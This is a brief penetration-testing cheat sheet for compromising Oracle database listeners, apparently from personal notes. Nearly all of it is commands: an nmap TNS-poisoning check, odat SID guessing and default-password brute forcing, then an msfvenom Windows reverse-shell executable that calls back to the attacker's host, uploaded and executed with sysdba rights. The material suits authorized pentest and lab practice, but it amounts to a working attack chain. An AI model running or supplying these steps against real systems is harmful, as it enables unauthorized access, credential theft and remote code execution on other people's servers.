Oracle exploitation:


nmap -Pn -sT --script=./oracle-tns-poison -p 1521 IP

If it's vuln, use odat

  1. sidguesser -s IP -p 1521

  2. double check if the system is vuln (if the username is XE)

python3 tnspoison -s IP -d XE --test-modul

3. obtain creds

python3 passwordguesser -s IP -p 1521 --accounts-file oracle_default_userpass.txt -d XE 

4. once you find creds, you can now upload malicious files!

generate it with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f exe > gori.exe 

Upload with

python3 utilfile -s IP -d XE -U USERNAME -P PASSWORD --sysdba -putfile C:/ gori.exe ./gori.exe 

Execute the file:

python3 externaltable -s IP -d XE -U USERNAME -P PASSWORD --sysdba -exec C:/ gori.exe 

Last updated